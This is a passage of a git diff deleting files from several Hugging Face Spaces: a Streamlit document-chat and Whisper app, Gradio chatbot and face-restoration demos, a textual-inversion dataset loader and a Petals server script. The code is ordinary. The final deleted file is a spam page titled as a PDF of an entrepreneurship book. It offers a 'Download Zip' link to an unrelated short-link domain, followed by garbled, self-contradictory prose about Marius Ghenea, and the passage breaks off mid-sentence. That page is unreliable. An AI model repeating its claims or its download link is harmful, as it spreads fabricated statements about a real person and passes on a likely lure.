length_function=len) - return text_splitter.split_text(text) - -# Vector Store using FAISS -@st.cache_resource -def vector_store(text_chunks): - embeddings = OpenAIEmbeddings(openai_api_key=key) - return FAISS.from_texts(texts=text_chunks, embedding=embeddings) - -# Memory and Retrieval chains -@st.cache_resource -def get_chain(vectorstore): - llm = ChatOpenAI() - memory = ConversationBufferMemory(memory_key='chat_history', return_messages=True) - return ConversationalRetrievalChain.from_llm(llm=llm, retriever=vectorstore.as_retriever(), memory=memory) - -def process_user_input(user_question): - response = st.session_state.conversation({'question': user_question}) - st.session_state.chat_history = response['chat_history'] - for i, message in enumerate(st.session_state.chat_history): - template = user_template if i % 2 == 0 else bot_template - st.write(template.replace("{{MSG}}", message.content), unsafe_allow_html=True) - filename = generate_filename(user_question, 'txt') - response = message.content - user_prompt = user_question - create_file(filename, user_prompt, response, should_save) - -def divide_prompt(prompt, max_length): - words = prompt.split() - chunks = [] - current_chunk = [] - current_length = 0 - for word in words: - if len(word) + current_length <= max_length: - current_length += len(word) + 1 - current_chunk.append(word) - else: - chunks.append(' '.join(current_chunk)) - current_chunk = [word] - current_length = len(word) - chunks.append(' '.join(current_chunk)) - return chunks - - -# 13. 
Provide way of saving all and deleting all to give way of reviewing output and saving locally before clearing it - -@st.cache_resource -def create_zip_of_files(files): - zip_name = "all_files.zip" - with zipfile.ZipFile(zip_name, 'w') as zipf: - for file in files: - zipf.write(file) - return zip_name - -@st.cache_resource -def get_zip_download_link(zip_file): - with open(zip_file, 'rb') as f: - data = f.read() - b64 = base64.b64encode(data).decode() - href = f'<a href="data:application/zip;base64,{b64}" download="{zip_file}">Download All</a>' # data-URI link; b64 payload was otherwise unused - return href - -# 14. Inference Endpoints for Whisper (best fastest STT) on NVIDIA T4 and Llama (best fastest AGI LLM) on NVIDIA A10 -# My Inference Endpoint -API_URL_IE = f'https://tonpixzfvq3791u9.us-east-1.aws.endpoints.huggingface.cloud' -# Original -API_URL_IE = "https://api-inference.huggingface.co/models/openai/whisper-small.en" -MODEL2 = "openai/whisper-small.en" -MODEL2_URL = "https://huggingface.co/openai/whisper-small.en" -#headers = { -# "Authorization": "Bearer XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", -# "Content-Type": "audio/wav" -#} -HF_KEY = os.getenv('HF_KEY') -headers = { - "Authorization": f"Bearer {HF_KEY}", - "Content-Type": "audio/wav" -} - -#@st.cache_resource -def query(filename): - with open(filename, "rb") as f: - data = f.read() - response = requests.post(API_URL_IE, headers=headers, data=data) - return response.json() - -def generate_filename(prompt, file_type): - central = pytz.timezone('US/Central') - safe_date_time = datetime.now(central).strftime("%m%d_%H%M") - replaced_prompt = prompt.replace(" ", "_").replace("\n", "_") - safe_prompt = "".join(x for x in replaced_prompt if x.isalnum() or x == "_")[:90] - return f"{safe_date_time}_{safe_prompt}.{file_type}" - -# 15. 
Audio recorder to Wav file -def save_and_play_audio(audio_recorder): - audio_bytes = audio_recorder() - if audio_bytes: - filename = generate_filename("Recording", "wav") - with open(filename, 'wb') as f: - f.write(audio_bytes) - st.audio(audio_bytes, format="audio/wav") - return filename - -# 16. Speech transcription to file output -def transcribe_audio(filename): - output = query(filename) - return output - -def whisper_main(): - st.title("Speech to Text") - st.write("Record your speech and get the text.") - - # Audio, transcribe, GPT: - filename = save_and_play_audio(audio_recorder) - if filename is not None: - transcription = transcribe_audio(filename) - try: - transcription = transcription['text'] - except: - st.write('Whisper model is asleep. Starting up now on T4 GPU - please give 5 minutes then retry as it scales up from zero to activate running container(s).') - - st.write(transcription) - response = StreamLLMChatResponse(transcription) - # st.write(response) - redundant with streaming result? - filename = generate_filename(transcription, ".txt") - create_file(filename, transcription, response, should_save) - #st.sidebar.markdown(get_table_download_link(filename), unsafe_allow_html=True) - - -# 17. Main -def main(): - - st.title("AI Drome Llama") - prompt = f"Write ten funny jokes that are tweet length stories that make you laugh. Show as markdown outline with emojis for each." - - # Add Wit and Humor buttons - add_witty_humor_buttons() - - example_input = st.text_input("Enter your example text:", value=prompt, help="Enter text to get a response from DromeLlama.") - if st.button("Run Prompt With DromeLlama", help="Click to run the prompt."): - try: - StreamLLMChatResponse(example_input) - except: - st.write('DromeLlama is asleep. 
Starting up now on A10 - please give 5 minutes then retry as KEDA scales up from zero to activate running container(s).') - - openai.api_key = os.getenv('OPENAI_KEY') - menu = ["txt", "htm", "xlsx", "csv", "md", "py"] - choice = st.sidebar.selectbox("Output File Type:", menu) - model_choice = st.sidebar.radio("Select Model:", ('gpt-3.5-turbo', 'gpt-3.5-turbo-0301')) - user_prompt = st.text_area("Enter prompts, instructions & questions:", '', height=100) - collength, colupload = st.columns([2,3]) # adjust the ratio as needed - with collength: - max_length = st.slider("File section length for large files", min_value=1000, max_value=128000, value=12000, step=1000) - with colupload: - uploaded_file = st.file_uploader("Add a file for context:", type=["pdf", "xml", "json", "xlsx", "csv", "html", "htm", "md", "txt"]) - document_sections = deque() - document_responses = {} - if uploaded_file is not None: - file_content = read_file_content(uploaded_file, max_length) - document_sections.extend(divide_document(file_content, max_length)) - if len(document_sections) > 0: - if st.button("👁️ View Upload"): - st.markdown("**Sections of the uploaded file:**") - for i, section in enumerate(list(document_sections)): - st.markdown(f"**Section {i+1}**\n{section}") - st.markdown("**Chat with the model:**") - for i, section in enumerate(list(document_sections)): - if i in document_responses: - st.markdown(f"**Section {i+1}**\n{document_responses[i]}") - else: - if st.button(f"Chat about Section {i+1}"): - st.write('Reasoning with your inputs...') - response = chat_with_model(user_prompt, section, model_choice) - st.write('Response:') - st.write(response) - document_responses[i] = response - filename = generate_filename(f"{user_prompt}_section_{i+1}", choice) - create_file(filename, user_prompt, response, should_save) - st.sidebar.markdown(get_table_download_link(filename), unsafe_allow_html=True) - if st.button('💬 Chat'): - st.write('Reasoning with your inputs...') - user_prompt_sections 
= divide_prompt(user_prompt, max_length) - full_response = '' - for prompt_section in user_prompt_sections: - response = chat_with_model(prompt_section, ''.join(list(document_sections)), model_choice) - full_response += response + '\n' # Combine the responses - response = full_response - st.write('Response:') - st.write(response) - filename = generate_filename(user_prompt, choice) - create_file(filename, user_prompt, response, should_save) - st.sidebar.markdown(get_table_download_link(filename), unsafe_allow_html=True) - - # Compose a file sidebar of past encounters - all_files = glob.glob("*.*") - all_files = [file for file in all_files if len(os.path.splitext(file)[0]) >= 20] # exclude files with short names - all_files.sort(key=lambda x: (os.path.splitext(x)[1], x), reverse=True) # sort by file type and file name in descending order - if st.sidebar.button("🗑 Delete All"): - for file in all_files: - os.remove(file) - st.experimental_rerun() - if st.sidebar.button("⬇️ Download All"): - zip_file = create_zip_of_files(all_files) - st.sidebar.markdown(get_zip_download_link(zip_file), unsafe_allow_html=True) - file_contents='' - next_action='' - for file in all_files: - col1, col2, col3, col4, col5 = st.sidebar.columns([1,6,1,1,1]) # adjust the ratio as needed - with col1: - if st.button("🌐", key="md_"+file): # md emoji button - with open(file, 'r') as f: - file_contents = f.read() - next_action='md' - with col2: - st.markdown(get_table_download_link(file), unsafe_allow_html=True) - with col3: - if st.button("📂", key="open_"+file): # open emoji button - with open(file, 'r') as f: - file_contents = f.read() - next_action='open' - with col4: - if st.button("🔍", key="read_"+file): # search emoji button - with open(file, 'r') as f: - file_contents = f.read() - next_action='search' - with col5: - if st.button("🗑", key="delete_"+file): - os.remove(file) - st.experimental_rerun() - - - if len(file_contents) > 0: - if next_action=='open': - file_content_area = 
st.text_area("File Contents:", file_contents, height=500) - if next_action=='md': - st.markdown(file_contents) - if next_action=='search': - file_content_area = st.text_area("File Contents:", file_contents, height=500) - st.write('Reasoning with your inputs...') - - # new - llama - response = StreamLLMChatResponse(file_contents) - filename = generate_filename(user_prompt, ".md") - create_file(filename, file_contents, response, should_save) - SpeechSynthesis(response) - - # old - gpt - #response = chat_with_model(user_prompt, file_contents, model_choice) - #filename = generate_filename(file_contents, choice) - #create_file(filename, user_prompt, response, should_save) - - st.experimental_rerun() - - # Feedback - # Step: Give User a Way to Upvote or Downvote - feedback = st.radio("Step 8: Give your feedback", ("👍 Upvote", "👎 Downvote")) - if feedback == "👍 Upvote": - st.write("You upvoted 👍. Thank you for your feedback!") - else: - st.write("You downvoted 👎. Thank you for your feedback!") - - load_dotenv() - st.write(css, unsafe_allow_html=True) - st.header("Chat with documents :books:") - user_question = st.text_input("Ask a question about your documents:") - if user_question: - process_user_input(user_question) - with st.sidebar: - st.subheader("Your documents") - docs = st.file_uploader("import documents", accept_multiple_files=True) - with st.spinner("Processing"): - raw = pdf2txt(docs) - if len(raw) > 0: - length = str(len(raw)) - text_chunks = txt2chunks(raw) - vectorstore = vector_store(text_chunks) - st.session_state.conversation = get_chain(vectorstore) - st.markdown('# AI Search Index of Length:' + length + ' Created.') # add timing - filename = generate_filename(raw, 'txt') - create_file(filename, raw, '', should_save) - -# 18. 
Run AI Pipeline -if __name__ == "__main__": - whisper_main() - main() \ No newline at end of file diff --git a/spaces/ayush5710/wizard-coder-34b-coding-chatbot/app.py b/spaces/ayush5710/wizard-coder-34b-coding-chatbot/app.py deleted file mode 100644 index ec9f05b7f39239dc7adc103c34838c2bce53a663..0000000000000000000000000000000000000000 --- a/spaces/ayush5710/wizard-coder-34b-coding-chatbot/app.py +++ /dev/null @@ -1,145 +0,0 @@ -import json -import os -import shutil -import requests - -import gradio as gr -from huggingface_hub import Repository, InferenceClient - -HF_TOKEN = os.environ.get("HF_TOKEN", None) -API_URL = "https://api-inference.huggingface.co/models/WizardLM/WizardCoder-Python-34B-V1.0" -BOT_NAME = "Wizard" - -STOP_SEQUENCES = ["\nUser:", "<|endoftext|>", " User:", "###"] - -EXAMPLES = [ - ["what are the benefits of programming in python?"], - ["explain binary search in java?"], - ] - -client = InferenceClient( - API_URL, - headers={"Authorization": f"Bearer {HF_TOKEN}"}, -) - -def format_prompt(message, history, system_prompt): - prompt = "" - if system_prompt: - prompt += f"System: {system_prompt}\n" - for user_prompt, bot_response in history: - prompt += f"User: {user_prompt}\n" - prompt += f"Wizard: {bot_response}\n" # Response already contains "Wizard: " - prompt += f"""User: {message} -Wizard:""" - return prompt - -seed = 42 - -def generate( - prompt, history, system_prompt="", temperature=0.4, max_new_tokens=800, top_p=0.95, repetition_penalty=1.5, -): - temperature = float(temperature) - if temperature < 1e-2: - temperature = 1e-2 - top_p = float(top_p) - global seed - generate_kwargs = dict( - temperature=temperature, - max_new_tokens=max_new_tokens, - top_p=top_p, - repetition_penalty=repetition_penalty, - stop_sequences=STOP_SEQUENCES, - do_sample=True, - seed=seed, - ) - seed = seed + 1 - formatted_prompt = format_prompt(prompt, history, system_prompt) - - stream = client.text_generation(formatted_prompt, **generate_kwargs, stream=True, 
details=True, return_full_text=False) - output = "" - - for response in stream: - output += response.token.text - - for stop_str in STOP_SEQUENCES: - if output.endswith(stop_str): - output = output[:-len(stop_str)] - output = output.rstrip() - yield output - yield output - return output - - -additional_inputs=[ - gr.Textbox("", label="Optional system prompt"), - gr.Slider( - label="Temperature", - value=0.4, - minimum=0.0, - maximum=1.0, - step=0.05, - interactive=True, - info="Higher values produce more diverse outputs", - ), - gr.Slider( - label="Max new tokens", - value=800, - minimum=0, - maximum=8192, - step=64, - interactive=True, - info="The maximum numbers of new tokens", - ), - gr.Slider( - label="Top-p (nucleus sampling)", - value=0.90, - minimum=0.0, - maximum=1, - step=0.05, - interactive=True, - info="Higher values sample more low-probability tokens", - ), - gr.Slider( - label="Repetition penalty", - value=1.5, - minimum=1.0, - maximum=2.0, - step=0.05, - interactive=True, - info="Penalize repeated tokens", - ) -] - - -def vote(data: gr.LikeData): - if data.liked: - print("You upvoted this response: " + data.value) - else: - print("You downvoted this response: " + data.value) - - -chatbot = gr.Chatbot(avatar_images=('user.png', 'bot.png'),bubble_full_width = False) - -chat_interface = gr.ChatInterface( - generate, - chatbot = chatbot, - examples=EXAMPLES, - additional_inputs=additional_inputs, - ) - - -with gr.Blocks() as demo: - with gr.Row(): - with gr.Column(): - gr.Markdown( - """# Wizard Coder 34b Demo - ## - This app provides a way of using wizard coder via a demo - - ⚠️ **Limitations**: the model can produce factually incorrect information, hallucinating facts and actions. 
""" - ) - - chatbot.like(vote, None, None) - chat_interface.render() - -demo.queue(concurrency_count=100, api_open=False).launch(show_api=False) \ No newline at end of file diff --git a/spaces/beihai/GFPGAN-V1.3-whole-image/.history/app_20220327005406.py b/spaces/beihai/GFPGAN-V1.3-whole-image/.history/app_20220327005406.py deleted file mode 100644 index 43c7248137807e6458b0e62c42481571795ea9de..0000000000000000000000000000000000000000 --- a/spaces/beihai/GFPGAN-V1.3-whole-image/.history/app_20220327005406.py +++ /dev/null @@ -1,65 +0,0 @@ -import os -#os.system("pip install gfpgan") - -#os.system("pip freeze") -#os.system("wget https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth -P .") -import random -import gradio as gr -from PIL import Image -import torch -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/thumb/a/ab/Abraham_Lincoln_O-77_matte_collodion_print.jpg/1024px-Abraham_Lincoln_O-77_matte_collodion_print.jpg', 'lincoln.jpg') -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/5/50/Albert_Einstein_%28Nobel%29.png', 'einstein.png') -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/thumb/9/9d/Thomas_Edison2.jpg/1024px-Thomas_Edison2.jpg', 'edison.jpg') -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/thumb/a/a9/Henry_Ford_1888.jpg/1024px-Henry_Ford_1888.jpg', 'Henry.jpg') -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/thumb/0/06/Frida_Kahlo%2C_by_Guillermo_Kahlo.jpg/800px-Frida_Kahlo%2C_by_Guillermo_Kahlo.jpg', 'Frida.jpg') - - - - -import cv2 -import glob -import numpy as np -from basicsr.utils import imwrite -from gfpgan import GFPGANer - -import warnings -warnings.warn('The unoptimized RealESRGAN is very slow on CPU. We do not use it. 
' - 'If you really want to use it, please modify the corresponding codes.') -bg_upsampler = None - - - -# set up GFPGAN restorer -restorer = GFPGANer( - model_path='experiments/pretrained_models/GFPGANv1.3.pth', - upscale=2, - arch='clean', - channel_multiplier=2, - bg_upsampler=bg_upsampler) - - -def inference(img): - input_img = cv2.imread(img, cv2.IMREAD_COLOR) - cropped_faces, restored_faces, restored_img = restorer.enhance( - input_img, has_aligned=False, only_center_face=False, paste_back=True) - - return Image.fromarray(restored_img[0][:,:,::-1]) - -title = "GFP-GAN" -description = "Gradio demo for GFP-GAN: Towards Real-World Blind Face Restoration with Generative Facial Prior. To use it, simply upload your image, or click one of the examples to load them. Read more at the links below. Please click submit only once" -article = "

    Towards Real-World Blind Face Restoration with Generative Facial Prior | Github Repo

    visitor badge
    " -gr.Interface( - inference, - [gr.inputs.Image(type="filepath", label="Input")], - gr.outputs.Image(type="pil", label="Output"), - title=title, - description=description, - article=article, - examples=[ - ['lincoln.jpg'], - ['einstein.png'], - ['edison.jpg'], - ['Henry.jpg'], - ['Frida.jpg'] - ] - ).launch(enable_queue=True,cache_examples=True) \ No newline at end of file diff --git a/spaces/beihai/GFPGAN-V1.3-whole-image/basicsr/version.py b/spaces/beihai/GFPGAN-V1.3-whole-image/basicsr/version.py deleted file mode 100644 index 2a89fa19125b471e5ab2f67ab86b63e6704b5a32..0000000000000000000000000000000000000000 --- a/spaces/beihai/GFPGAN-V1.3-whole-image/basicsr/version.py +++ /dev/null @@ -1,5 +0,0 @@ -# GENERATED VERSION FILE -# TIME: Wed Mar 16 21:28:35 2022 -__version__ = '1.3.5' -__gitsha__ = '6697f41' -version_info = (1, 3, 5) diff --git a/spaces/bigPear/digitalWDF/app.py b/spaces/bigPear/digitalWDF/app.py deleted file mode 100644 index 7300ed25e2e0fb1c51535ca7a622c524946fd71f..0000000000000000000000000000000000000000 --- a/spaces/bigPear/digitalWDF/app.py +++ /dev/null @@ -1,41 +0,0 @@ -import sys -from transformers import AutoModel, AutoTokenizer -import gradio as gr -sys.path.append("src") -from src import load_pretrained, ModelArguments - -# if __name__ == "__main__": -model_args = ModelArguments(checkpoint_dir="combined") -model, tokenizer = load_pretrained(model_args) -model = model.half().cuda() -model = model.eval() - -import time - -def predict(input, history=None): - if history is None: - history = [] - response, _ = model.chat(tokenizer, input, history) - history[-1][1] = "" - for character in response: - history[-1][1] += character - time.sleep(0.05) - yield history - -with gr.Blocks() as demo: - gr.Markdown('''## DigitalWDF - unofficial demo - ''') - chatbot = gr.Chatbot([], elem_id="chatbot").style(height=200) - - - def user(user_message, history): - return history + [[user_message, None]] - - with gr.Row(): - with gr.Column(scale=4): - txt 
= gr.Textbox(show_label=False, placeholder="Enter text and press enter").style(container=False) - with gr.Column(scale=1): - button = gr.Button("Generate") - txt.submit(user, [txt, chatbot], chatbot, queue=False).then(predict, [txt, chatbot], chatbot) - button.click(user, [txt, chatbot], chatbot, queue=False).then(predict, [txt, chatbot], chatbot) -demo.queue().launch() \ No newline at end of file diff --git a/spaces/bigjoker/stable-diffusion-webui/modules/textual_inversion/dataset.py b/spaces/bigjoker/stable-diffusion-webui/modules/textual_inversion/dataset.py deleted file mode 100644 index 093efcd4fc70602a802a82bc50457d0a5d08b5e2..0000000000000000000000000000000000000000 --- a/spaces/bigjoker/stable-diffusion-webui/modules/textual_inversion/dataset.py +++ /dev/null @@ -1,246 +0,0 @@ -import os -import numpy as np -import PIL -import torch -from PIL import Image -from torch.utils.data import Dataset, DataLoader, Sampler -from torchvision import transforms -from collections import defaultdict -from random import shuffle, choices - -import random -import tqdm -from modules import devices, shared -import re - -from ldm.modules.distributions.distributions import DiagonalGaussianDistribution - -re_numbers_at_start = re.compile(r"^[-\d]+\s*") - - -class DatasetEntry: - def __init__(self, filename=None, filename_text=None, latent_dist=None, latent_sample=None, cond=None, cond_text=None, pixel_values=None, weight=None): - self.filename = filename - self.filename_text = filename_text - self.weight = weight - self.latent_dist = latent_dist - self.latent_sample = latent_sample - self.cond = cond - self.cond_text = cond_text - self.pixel_values = pixel_values - - -class PersonalizedBase(Dataset): - def __init__(self, data_root, width, height, repeats, flip_p=0.5, placeholder_token="*", model=None, cond_model=None, device=None, template_file=None, include_cond=False, batch_size=1, gradient_step=1, shuffle_tags=False, tag_drop_out=0, latent_sampling_method='once', 
varsize=False, use_weight=False): - re_word = re.compile(shared.opts.dataset_filename_word_regex) if len(shared.opts.dataset_filename_word_regex) > 0 else None - - self.placeholder_token = placeholder_token - - self.flip = transforms.RandomHorizontalFlip(p=flip_p) - - self.dataset = [] - - with open(template_file, "r") as file: - lines = [x.strip() for x in file.readlines()] - - self.lines = lines - - assert data_root, 'dataset directory not specified' - assert os.path.isdir(data_root), "Dataset directory doesn't exist" - assert os.listdir(data_root), "Dataset directory is empty" - - self.image_paths = [os.path.join(data_root, file_path) for file_path in os.listdir(data_root)] - - self.shuffle_tags = shuffle_tags - self.tag_drop_out = tag_drop_out - groups = defaultdict(list) - - print("Preparing dataset...") - for path in tqdm.tqdm(self.image_paths): - alpha_channel = None - if shared.state.interrupted: - raise Exception("interrupted") - try: - image = Image.open(path) - #Currently does not work for single color transparency - #We would need to read image.info['transparency'] for that - if use_weight and 'A' in image.getbands(): - alpha_channel = image.getchannel('A') - image = image.convert('RGB') - if not varsize: - image = image.resize((width, height), PIL.Image.BICUBIC) - except Exception: - continue - - text_filename = os.path.splitext(path)[0] + ".txt" - filename = os.path.basename(path) - - if os.path.exists(text_filename): - with open(text_filename, "r", encoding="utf8") as file: - filename_text = file.read() - else: - filename_text = os.path.splitext(filename)[0] - filename_text = re.sub(re_numbers_at_start, '', filename_text) - if re_word: - tokens = re_word.findall(filename_text) - filename_text = (shared.opts.dataset_filename_join_string or "").join(tokens) - - npimage = np.array(image).astype(np.uint8) - npimage = (npimage / 127.5 - 1.0).astype(np.float32) - - torchdata = torch.from_numpy(npimage).permute(2, 0, 1).to(device=device, 
dtype=torch.float32) - latent_sample = None - - with devices.autocast(): - latent_dist = model.encode_first_stage(torchdata.unsqueeze(dim=0)) - - #Perform latent sampling, even for random sampling. - #We need the sample dimensions for the weights - if latent_sampling_method == "deterministic": - if isinstance(latent_dist, DiagonalGaussianDistribution): - # Works only for DiagonalGaussianDistribution - latent_dist.std = 0 - else: - latent_sampling_method = "once" - latent_sample = model.get_first_stage_encoding(latent_dist).squeeze().to(devices.cpu) - - if use_weight and alpha_channel is not None: - channels, *latent_size = latent_sample.shape - weight_img = alpha_channel.resize(latent_size) - npweight = np.array(weight_img).astype(np.float32) - #Repeat for every channel in the latent sample - weight = torch.tensor([npweight] * channels).reshape([channels] + latent_size) - #Normalize the weight to a minimum of 0 and a mean of 1, that way the loss will be comparable to default. - weight -= weight.min() - weight /= weight.mean() - elif use_weight: - #If an image does not have a alpha channel, add a ones weight map anyway so we can stack it later - weight = torch.ones(latent_sample.shape) - else: - weight = None - - if latent_sampling_method == "random": - entry = DatasetEntry(filename=path, filename_text=filename_text, latent_dist=latent_dist, weight=weight) - else: - entry = DatasetEntry(filename=path, filename_text=filename_text, latent_sample=latent_sample, weight=weight) - - if not (self.tag_drop_out != 0 or self.shuffle_tags): - entry.cond_text = self.create_text(filename_text) - - if include_cond and not (self.tag_drop_out != 0 or self.shuffle_tags): - with devices.autocast(): - entry.cond = cond_model([entry.cond_text]).to(devices.cpu).squeeze(0) - groups[image.size].append(len(self.dataset)) - self.dataset.append(entry) - del torchdata - del latent_dist - del latent_sample - del weight - - self.length = len(self.dataset) - self.groups = list(groups.values()) - 
assert self.length > 0, "No images have been found in the dataset." - self.batch_size = min(batch_size, self.length) - self.gradient_step = min(gradient_step, self.length // self.batch_size) - self.latent_sampling_method = latent_sampling_method - - if len(groups) > 1: - print("Buckets:") - for (w, h), ids in sorted(groups.items(), key=lambda x: x[0]): - print(f" {w}x{h}: {len(ids)}") - print() - - def create_text(self, filename_text): - text = random.choice(self.lines) - tags = filename_text.split(',') - if self.tag_drop_out != 0: - tags = [t for t in tags if random.random() > self.tag_drop_out] - if self.shuffle_tags: - random.shuffle(tags) - text = text.replace("[filewords]", ','.join(tags)) - text = text.replace("[name]", self.placeholder_token) - return text - - def __len__(self): - return self.length - - def __getitem__(self, i): - entry = self.dataset[i] - if self.tag_drop_out != 0 or self.shuffle_tags: - entry.cond_text = self.create_text(entry.filename_text) - if self.latent_sampling_method == "random": - entry.latent_sample = shared.sd_model.get_first_stage_encoding(entry.latent_dist).to(devices.cpu) - return entry - - -class GroupedBatchSampler(Sampler): - def __init__(self, data_source: PersonalizedBase, batch_size: int): - super().__init__(data_source) - - n = len(data_source) - self.groups = data_source.groups - self.len = n_batch = n // batch_size - expected = [len(g) / n * n_batch * batch_size for g in data_source.groups] - self.base = [int(e) // batch_size for e in expected] - self.n_rand_batches = nrb = n_batch - sum(self.base) - self.probs = [e%batch_size/nrb/batch_size if nrb>0 else 0 for e in expected] - self.batch_size = batch_size - - def __len__(self): - return self.len - - def __iter__(self): - b = self.batch_size - - for g in self.groups: - shuffle(g) - - batches = [] - for g in self.groups: - batches.extend(g[i*b:(i+1)*b] for i in range(len(g) // b)) - for _ in range(self.n_rand_batches): - rand_group = choices(self.groups, self.probs)[0] 
- batches.append(choices(rand_group, k=b)) - - shuffle(batches) - - yield from batches - - -class PersonalizedDataLoader(DataLoader): - def __init__(self, dataset, latent_sampling_method="once", batch_size=1, pin_memory=False): - super(PersonalizedDataLoader, self).__init__(dataset, batch_sampler=GroupedBatchSampler(dataset, batch_size), pin_memory=pin_memory) - if latent_sampling_method == "random": - self.collate_fn = collate_wrapper_random - else: - self.collate_fn = collate_wrapper - - -class BatchLoader: - def __init__(self, data): - self.cond_text = [entry.cond_text for entry in data] - self.cond = [entry.cond for entry in data] - self.latent_sample = torch.stack([entry.latent_sample for entry in data]).squeeze(1) - if all(entry.weight is not None for entry in data): - self.weight = torch.stack([entry.weight for entry in data]).squeeze(1) - else: - self.weight = None - #self.emb_index = [entry.emb_index for entry in data] - #print(self.latent_sample.device) - - def pin_memory(self): - self.latent_sample = self.latent_sample.pin_memory() - return self - -def collate_wrapper(batch): - return BatchLoader(batch) - -class BatchLoaderRandom(BatchLoader): - def __init__(self, data): - super().__init__(data) - - def pin_memory(self): - return self - -def collate_wrapper_random(batch): - return BatchLoaderRandom(batch) \ No newline at end of file diff --git a/spaces/bigscience/petals-api/cli/run_server.py b/spaces/bigscience/petals-api/cli/run_server.py deleted file mode 100644 index 2e93a6699fa82d0ce0d80a4016d4996ca1d4092b..0000000000000000000000000000000000000000 --- a/spaces/bigscience/petals-api/cli/run_server.py +++ /dev/null @@ -1,85 +0,0 @@ -import configargparse -from hivemind.proto.runtime_pb2 import CompressionType -from hivemind.utils.limits import increase_file_limit -from hivemind.utils.logging import get_logger, use_hivemind_log_handler - -from src.server.server import Server - -use_hivemind_log_handler("in_root_logger") -logger = get_logger(__file__) - 
- -def main(): - # fmt:off - parser = configargparse.ArgParser(default_config_files=["config.yml"]) - parser.add('-c', '--config', required=False, is_config_file=True, help='config file path') - - parser.add_argument('--converted_model_name_or_path', type=str, default='bigscience/test-bloomd-6b3', - help="path or name of a pretrained model, converted with cli/convert_model.py (see README.md)") - parser.add_argument('--num_blocks', type=int, default=None, help="The number of blocks to serve") - parser.add_argument('--block_indices', type=str, default=None, help="Specific block indices to serve") - parser.add_argument('--prefix', type=str, default=None, help="Announce all blocks with this prefix. By default, " - "use the same name as in the converted model.") - parser.add_argument('--host_maddrs', nargs='+', default=['/ip4/0.0.0.0/tcp/0'], required=False, - help='Multiaddrs to listen for external connections from other p2p instances; default: all IPv4 and TCP: /ip4/0.0.0.0/tcp/0') - parser.add_argument('--announce_maddrs', nargs='+', default=None, required=False, - help='Visible multiaddrs the host announces for external connections from other p2p instances') - - parser.add_argument('--compression', type=str, default='NONE', required=False, help='Tensor compression communication') - - parser.add_argument('--num_handlers', type=int, default=None, required=False, - help='server will use this many processes to handle incoming requests') - parser.add_argument('--min_batch_size', type=int, default=1, - help='Minimum required batch size for all expert operations') - parser.add_argument('--max_batch_size', type=int, default=16384, - help='The total number of examples in the same batch will not exceed this value') - parser.add_argument('--cache_size_bytes', type=int, default=None, - help='The size of memory cache for storing past attention keys/values between inference steps') - parser.add_argument('--device', type=str, default=None, required=False, - help='all experts will 
use this device in torch notation; default: cuda if available else cpu') - parser.add_argument("--torch_dtype", type=str, default="auto", - help="Use this dtype to store block weights and do computations. " - "By default, respect the dtypes in the pre-trained state dict.") - - parser.add_argument('--update_period', type=float, required=False, default=30, - help='Server will report experts to DHT once in this many seconds') - parser.add_argument('--expiration', type=float, required=False, default=None, - help='DHT entries will expire after this many seconds') - parser.add_argument('--initial_peers', type=str, nargs='*', required=False, default=[], - help='multiaddrs of one or more active DHT peers (if you want to join an existing DHT)') - parser.add_argument('--increase_file_limit', action='store_true', - help='On *nix, this will increase the max number of processes ' - 'a server can spawn before hitting "Too many open files"; Use at your own risk.') - parser.add_argument('--stats_report_interval', type=int, required=False, - help='Interval between two reports of batch processing performance statistics') - - parser.add_argument('--custom_module_path', type=str, required=False, - help='Path of a file with custom nn.modules, wrapped into special decorator') - parser.add_argument('--identity_path', type=str, required=False, help='Path to identity file to be used in P2P') - parser.add_argument("--use_auth_token", type=str, default=None, help="auth token for from_pretrained") - - # fmt:on - args = vars(parser.parse_args()) - args.pop("config", None) - - if args.pop("increase_file_limit"): - increase_file_limit() - - compression_type = args.pop("compression") - compression = getattr(CompressionType, compression_type) - - use_auth_token = args.pop("use_auth_token") - args["use_auth_token"] = True if use_auth_token in ("True", "true", "") else use_auth_token - - server = Server.create(**args, start=True, compression=compression) - - try: - server.join() - except 
KeyboardInterrupt: - logger.info("Caught KeyboardInterrupt, shutting down") - finally: - server.shutdown() - - -if __name__ == "__main__": - main() diff --git a/spaces/bioriAsaeru/text-to-voice/Carte Antreprenoriat Marius Ghenea.pdf.md b/spaces/bioriAsaeru/text-to-voice/Carte Antreprenoriat Marius Ghenea.pdf.md deleted file mode 100644 index 388e6c04b090550578c7eb859607368e2d9d6d4e..0000000000000000000000000000000000000000 --- a/spaces/bioriAsaeru/text-to-voice/Carte Antreprenoriat Marius Ghenea.pdf.md +++ /dev/null @@ -1,16 +0,0 @@ -

    Carte Antreprenoriat Marius Ghenea.pdf


    Download Zip ===> https://urloso.com/2uyRjb



    - -Download and read Marius Ghenea – Carte antreprenoriat Marius Ghenea – Carte antreprenoriat - The real world of entrepreneurship and business podcast – Marius Ghenea English. Marius Ghenea is among other things – serial entrepreneur and business. Marius Ghenea has not yet updated his profile. Marius Ghenea is the son of Marius Ghenea, industrialist and bibliophile. Marius Ghenea started a company called Ghenea in 1980, with two partners. The partners got into contact with the Batzla Project which was headed by Giovanni della Casa from 1980 to 1985. In the summer of 1981 a series of first exchanges took place with the Batzla project. The conditions for the. - -I have also got experience in law in the area of information technology and the right to privacy, law, administration, contract and organisation. The information we gathered in the call-center interviews. Ghenea, chairman and CEO of Orion – A software company that develops integrated marketing technology software for the retail industry. - -Ghenea holds a MBA degree from the University of Pisa and has completed the Executive education program for Sales and Marketing of the EU (Universit. Ghenea came to the U. The future of the industry of books will be about two companies. Ghenea with his partner Moratelli Fiere the founder of Batzla project in Siena. - -Ghenea and his family were refugees from Romania. The Carte antreprenoriat Marius Ghenea http: Marius Ghenea son of Marius Ghenea started in 1980 with two partners: Marius Ghenea was born in Bucharest and emigrated to Italy. Ghenea owns two firms, one in Italy and one in Portugal. Carte antreprenoriat Ghenea maintains that the expansion of the sector of education has failed. - -The interview with Ghenea is addressed to journalists and 